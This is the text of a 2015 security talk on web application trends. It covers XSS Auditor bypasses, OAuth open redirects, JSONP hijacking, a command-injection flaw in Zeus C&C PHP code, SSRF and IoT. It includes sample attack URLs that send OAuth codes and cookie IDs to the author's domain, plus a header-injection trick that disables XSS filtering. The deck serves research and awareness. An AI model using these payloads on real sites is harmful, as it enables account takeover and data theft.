Web application security trends

Omar Ganiev

28/02/2015

Hi!

I’m Beched, and I love hacking an solving problems.Let’s observe overall trends and some recently published papers, vulnerabilities and techniques, connected with web application security.

Classification

Questions to classify the vulnerabilities:• Is the exploitation technique new or known?• Is the attack target new or known technology?• How large is a potential attack surface?

Sourcesof news

• Bug trackers, mailing lists

• https://blackhat.com/html/archives.html

• https://blog.whitehatsec.com/top-10-web-hacking-techniques-2013/

• https://blog.whitehatsec.com/top-10-web-hacking-techniques-of-2014/

• …

Community opinion

• 30.77% of respondents from rdot.org will go to dance a ballet, because web hacking is gonna become way too complex =)

Obvious remarks

• Growth of security awareness of developers makes their code more secure

• At the same time new products and technologies are often released without careful security audit

• Old software is often considered as safe and trusty but contains severe vulnerabilities

• Business logic bugs are alive

Obvious remarks

• Infosec is part of CS and IT, and it inherits global trends

• The global trend is a wide spread of various gadgets and mobile devices

• The global trend is making houses and vehicles smart

• The global trend is making web interfaces rich and self-contained in the browsers

Take a look• There’re loads of papers and presentations at BlackHat

archives. If we filter those, which are connected with web security, and range the topics, we get the following scoreboard of trends:

• client-side && mobile• clouds && big data && social networks• misc && classic• TLS && SSL• IoT && routers• PRNG && SSRF && etc• old soft

Client-side && Mobile

• Known technologies, new life• There’re loads of papers on client-side security• Loads of bug bounties are given for XSS or

something like that• There’re a lot of tricky techniques, and we can

see a long war between browser developers and XSS hunters

• Mobile browsers are also targeted. Some mobile OS interfaces are HTML5-based, which increases impact of XSS

Client-side && MobileDISSECTING CSRF ATTACKS & COUNTERMEASURES

JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME

MILLION BROWSER BOTNET

PIXEL PERFECT TIMING ATTACKS WITH HTML5

ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS

CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY

THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT

CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING

REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR

REVISITING XSS SANITIZATION

SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS

SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS

TWO FACTOR FAILURE

THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES

JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY

UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED

ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD

Client-side && Mobile

• UXSS, MXSS

• ChromeOS, FirefoxOS

• Browser extensions hacking

• Endless security features vs bypass war

• XSS Auditor, CSP, HttpOnly, SOP, CORS

• Funny things like RFD (reflected file download)

• OAuth bugs

Example

• Chrome XSS auditor breaks a lot of attacks, but in most cases it can be bypassed, or at least an attack can be modified

• The idea is that it looks for complete tag names or attributes from the page in the HTTP request packets

• There’re plenty of bypasses, take a look athttp://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/https://www.blackhat.com/docs/us-14/materials/us-14-Johns-Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side-XSS-Filtering.pdf

Example• Other bypasses include CSRF tokens leakage, form target

forgery, etc

Example• Secure CMS and XSS Auditor can be spoiled with

plugins

• Look at this typographic plugin for Drupal:

var result = Typographus_Lite_UTF8.typo_text( $(this).text() ); $(this).after(result).remove();

• JQuery method after() is insecure. As a result, div contents become HTML-decoded, and all your reflected or stored <script> stuff becomes active

Example

• OAuth is often vulnerable to open redirect due to lack of redirect_uri validation

https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&scope=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257

After authorization redirects to:http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85458d0db1c65792d52c8bef3c4407374b2

• Access token (code) value is enough for account takeover

Clouds && Big data && Social networks

• Fairly new technologies

• Cloud computing and machine learning are heavily used for different purposes

• As for infosec, this can be used both for attack and defense

• Social networks and big data providers can be exploited for deanonymization and fraud

• Machine learning can be used for building WAF

Clouds && Big data && Social networks

PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS BIG DATA FOR WEB APPLICATION SECURITY FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFICPIVOTING IN AMAZON CLOUDSBRINGING A MACHETE TO THE AMAZONBABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALESECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORINGBLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMSHADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANTHOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS

Example• Post-exploitation of distributed web applications is

often a bit tricky – you don’t exactly know which node will process your request

• Nodes can often be enumerated via HTTP response headers or cookies

• Sometimes some nodes are not updated and contain vulnerabilities

• This creates mind-blowing phantom vulnerabilities =)• Take a look at cool talk about Amazon EC2 post-

exploitation: https://www.blackhat.com/docs/us-14/materials/us-14-Riancho-Pivoting-In-Amazon-Clouds.pdf

Example• Data providers are often used for targeted

marketing. However, their data can sometimes be stolen and used for deanonymisation or fraud. This is documented API request:

https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=http://incsecurity.ru/?adv_id=$UID

• $UID will be replaced with actual cookie value by the server and will be sent to attacker host

• Information about user can be obtained via JSONP hijacking, even if session id is checked.

Example• Request:https://*.ru/api/get/?uid=$UID&success_cb=_cb_s&fail_cb=_cb_e&st=1• Response contains information about gender, interests, etc. Part of

interests description file:…

{"id": "40010082","segment": "Fetish & Bondage","category": "Interests","section": "Interests","description": "“

}…

Misc & Classic

• There’re a lot of works which continue previous researches and bug reports

• They improve exploitation of classical vulnerabilities like SQL injection and testing/analysis methods

• The raise of penetration testing industry pushed up demand for .NET and J2EE applications hacking methods

Misc & Classic') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION

TECHNIQUES’)%00 INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE

WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA

CONTEMPORARY AUTOMATIC PROGRAM ANALYSISFINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG

IMPLEMENTATIONSI KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL

ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS

WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS!

SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS

Example

• The paper about hacking C&C panels reminded me of the RCE vulnerability in Zeus C&C, which I published near 2010. I opened these links now:

http://ahack.ru/bugs/zeus-vulnerability-exploit.htm

https://github.com/Visgean/Zeus/

• Guess what I see there since 5 years? ;)

Example• The name of function has changed, but vulnerability is still there,

AFAICS...function fsarcCreate($archive, $files)...$cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';exec($cli, $e, $r);...foreach($_POST['files'] as $file)$list[] = $_CUR_PATH.'/'.$file;...if(!function_exists('fsarcCreate') || ($arcfile = fsarcCreate($arcfile, $list))

=== false)die('Failed to create archive, please check "system/fsarc.php" script.');

...

Example• This is a small example, probably there’re more critical

vulnerabilities in this popular botnet C&C. BTW, how do you find vulnerabilities in the source code?

• Paper on contemporary automatic program analysis mostly tells about grep =)

• Personally I use grep with lovely regular expressions:\w*(include|require)(_once)?[\s\(]+(?!\s*('[^']*'|"[^"]*"|

)[@\s\.]*(urlencode|rand|rawurlencode|basename|levenshtein|doubleval|sizeof|base64_encode|strlen|floor|crypt|strrpos|filter_input|abs|bin2hex|bindec|hash|intval|max|decbin|strpos|crc32|ord|md5|count|sha1|min|pathinfo|floatval|round|hexdec)\s*\()[^;]*\$.*

Example

Example

• 2014 has gone, and here comes 2015, but PHP and Apache are still broken

• Several UAF vulnerabilities in PHP fixed recently, still a lot of restriction bypasses and RCE vulnerabilities live deep there

• Apache has not yet learnt RFC

• Other popular miscellaneous words among hackers: NoSQL, SSJS, SCADA, SAP

TLS && SSL

• As old as the world

• There’re still a lot of misconfiguration issues with HTTPS

• Also there’re a lot of scary words like BEAST, CRIME, BREACH, HeartBleed, POODLE, SSLStrip and others

• Many configuration mistakes are result of trade-off between performance and security

TLS && SSL

SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME

TLS 'SECRETS'

TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS

A PERFECT CRIME? ONLY TIME WILL TELL

THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP

BYPASSING HTTP STRICT TRANSPORT SECURITY

IoT && Routers• This is one of the most popular new IT trends

everyone heard about

• New means untested. Untested means vulnerable

• Seriously, the Internet of things is broken, and many yell about it

• People hack RF protocols of alarms, people find smart houses without doors via Shodan, etc, etc

IoT && Routers

EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER

HOME INVASION V2.0 - ATTACKING NETWORK-CONTROLLED HARDWARE

A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES

ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS

OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS

Example

• Just look at this:

Example

• And this:

Example

• And this (admin;admin):

Example

• BTW, side note: why doesn’t XSS Auditor perform HTTP response splitting check?

• As you could see on the screenshot above, response splitting kills XSS Auditor, because we can inject header X-XSS-Protection: 0.

PRNG && SSRF && etc

• XXE, SSRF and randomness hacking were hot topics of 2012-2013

• They are popular today too, new applications and attack vectors are developed

PRNG && SSRF && etc

BLACK-BOX ASSESSMENT OF PSEUDORANDOM ALGORITHMS

XML OUT-OF-BAND DATA RETRIEVAL

THE NEW PAGE OF INJECTIONS BOOK: MEMCACHED INJECTIONS

ICSCORSAIR: HOW I WILL PWN YOUR ERP THROUGH 4-20 MA CURRENT LOOP

Example• Autodiscover interface in OWA reveals an internal

IP address of the mail server

• Ev.owa interface with cPfdDC parameter can be used to send some LDAP requests and connect to different hosts (“domain controllers”)

Microsoft.Exchange.Data.Directory.SuitabilityVerifier.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential)

• If there was bypass for anti-CSRF canary, you could possibly steal NTLM credentials

Example• vBulletin forum CMS allows to upload attachments

from remote URL (class_upload.php, class_vurl.php)

• First it checks the file size via HEAD request, then it downloads the file

• You can use HTTP multiplexor to exploit race condition and return code 200 and valid file size for the first request and 302 redirect for the second request

• Some configuration options and old versions of cURL allow file:// URL wrapper in Location header

Old soft• We’ve witnessed several critical vulnerabilities

in well-known and widely used software in 2014

• HeartBleed, GHOST, ShellShock, POODLE, gotofail, etc

• Probably it’s an important moment, when we stop trusting and begin reviewing all the fundamental old software that we use everywhere

Old soft

EPIDEMIOLOGY OF SOFTWARE VULNERABILITIES: A STUDY OF ATTACK SURFACE SPREAD

SSL VALIDATION CHECKING VS. GO(ING) TO FAIL

Example

• Although these famous vulnerabilities are not caused by web applications, they deeply affect them

• ShellShock and GHOST affect webapp<->OS interaction layer

• HeartBleed, goto fail, POODLE, affect mainly webapp<->encryption<->network interaction layer

Example

• This is another proof of why shouldn’t we consider any part of the software as trusted. Each component of the system can be broken

• BTW, newspapermen also started the era of nicknames for vulnerabilities

• I find this a bit ridiculous but funny =)

Summary

• The Internet is broken

• The WWW is broken

• Hackers gonna hack

• Web applications become smarter

• Hacking becomes smarter

Questions?

beched@incsecurity.ru